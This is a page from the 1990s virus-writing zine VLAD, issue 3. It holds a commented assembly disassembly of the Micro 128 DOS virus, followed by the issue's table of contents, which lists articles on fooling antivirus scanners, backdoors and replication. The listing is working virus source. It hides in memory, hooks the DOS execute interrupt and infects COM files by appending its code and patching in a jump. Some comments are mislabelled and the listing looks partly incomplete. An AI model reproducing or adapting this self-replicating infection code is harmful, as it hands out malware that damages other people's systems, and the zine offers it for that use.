Virus Labs & Distribution
VLAD #3 - Micro128 Disasm

;                             Darkman/VLAD
;                           Proudly Presents
;                       Disassembly of Micro 128

micro128     segment
             assume  cs:micro128,ds:micro128,es:micro128
             org     100h                ; Origin of COM-file

jumpcode     db      0e9h,03h,00h        ; Jump to viruscode
realcode     db      0cdh,20h,90h        ; Real code of infected file

             lea     di,code             ; DI = offset of code
             push    di                  ; Save DI at stack
             mov     si,di
             add     si,[di+01h]         ; SI = delta offset (viruscode)
             movsw                       ; Move the real code to beginning
             movsb                       ;  "    "   "    "   "   "     "
             xor     ax,ax               ; Clear AX
             mov     es,ax               ; ES = interrupt table
             mov     di,303h             ; DI = offset of hole in memory
             mov     cl,7dh              ; Move 125 bytes
             rep     movsb               ; Move virus to hole in memory
             scasw                       ; Overwritten anything?
             jne     virusexit           ; Not equal? Jump to virusexit
             std                         ; Set direction flag
             xchg    ax,es:[di+0fd04h]   ; Exchange AX with int 21h
             stosw                       ; Store address of interrupt 21h
             mov     ax,033fh            ; AX = offset of virusint21
             cmc                         ; Complement carry flag
             jb      setintvec           ; Carry flag? Jump to setintvec
             cld                         ; Clear direction flag
             push    cs                  ; Save CS at stack
             pop     es                  ; Load ES from stack (CS)
             ret                         ; Return!
             mov     al,00h              ; Move file pointer from beginning
             mov     ah,42h              ; Move file pointer
             xor     cx,cx               ; Clear CX
             xor     dx,dx               ; Clear DX
             int     0e0h                ; Do it!

             mov     cl,03h
             mov     dh,03h
             ret                         ; Return!

micro128cod  db      0e9h,?,?            ; New code of infected file
             cmp     ah,4bh              ; Load or execute?
             jne     int21exit           ; Not equal? Jump to int21exit

             push    ax                  ; Save AX at stack
             push    bx                  ; Save BX at stack
             push    dx                  ; Save DX at stack
             push    ds                  ; Save DS at stack

             mov     ax,3d02h            ; Open file (read/write)
             int     0e0h                ; Do it!
             jb      closefile           ; Below? Jump to closefile
             mov     bx,ax               ; BX = file handle

             push    cs                  ; Save CS at stack
             pop     ds                  ; Load DS from stack (CS)
             call    mvfptrbegin

             mov     ah,3fh              ; Read from file
             int     0e0h                ; Do it!
             cmp     byte ptr ds:[300h],'M'
             je      closefile           ; Equal? Jump to closefile

             dec     ax                  ; Decrease AX
             call    movefileptr
             mov     ds:[33dh],ax        ; Store offset of virus code

             mov     ah,40h              ; Write to file
             mov     cl,(codeend-viruscode)
             int     0e0h                ; Do it!

             call    mvfptrbegin

             mov     dl,3ch              ; DX = offset of micro128cod
             mov     ah,40h              ; Write to file
             int     0e0h                ; Do it!
             mov     ah,3eh              ; Close file
             int     0e0h                ; Do it!

             pop     ds                  ; Load DS from stack
             pop     dx                  ; Load DS from stack
             pop     bx                  ; Load DS from stack
             pop     ax                  ; Load DS from stack
jumpfar      db      0eah                ; Object code of jump far

micro128     ends
end          code


ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


The Press
ARTICLE.2_2       Fooling TBScan
ARTICLE.2_3       Backdoors
ARTICLE.2_4       Tracing Int21
ARTICLE.2_5       Replication
ARTICLE.2_6       VSUM denial
ARTICLE.2_7       Proview


TBTSR Checking
ARTICLE.3_2       TBScan Flags
ARTICLE.3_3       HD Port Reading
ARTICLE.3_4       HD Port Writing
ARTICLE.3_5       TBAV Monitor
ARTICLE.3_6       Micro128 Disasm
ARTICLE.3_7       Aust403 Disasm


Virus Descriptions
ARTICLE.4_2       Hemlock
ARTICLE.4_3       Antipode
ARTICLE.4_4       Insert
ARTICLE.4_6       Quantum Magick
ARTICLE.4_7       Mon Ami La Pendule


ARTICLE.5_2       Small Virus
ARTICLE.5_3       Catch-22
ARTICLE.5_4       ART Engine
ARTICLE.5_5       Megastealth
ARTICLE.5_6       Virus Scripts
ARTICLE.5_7       What's Next ?

About VLAD - Links - Contact Us - Main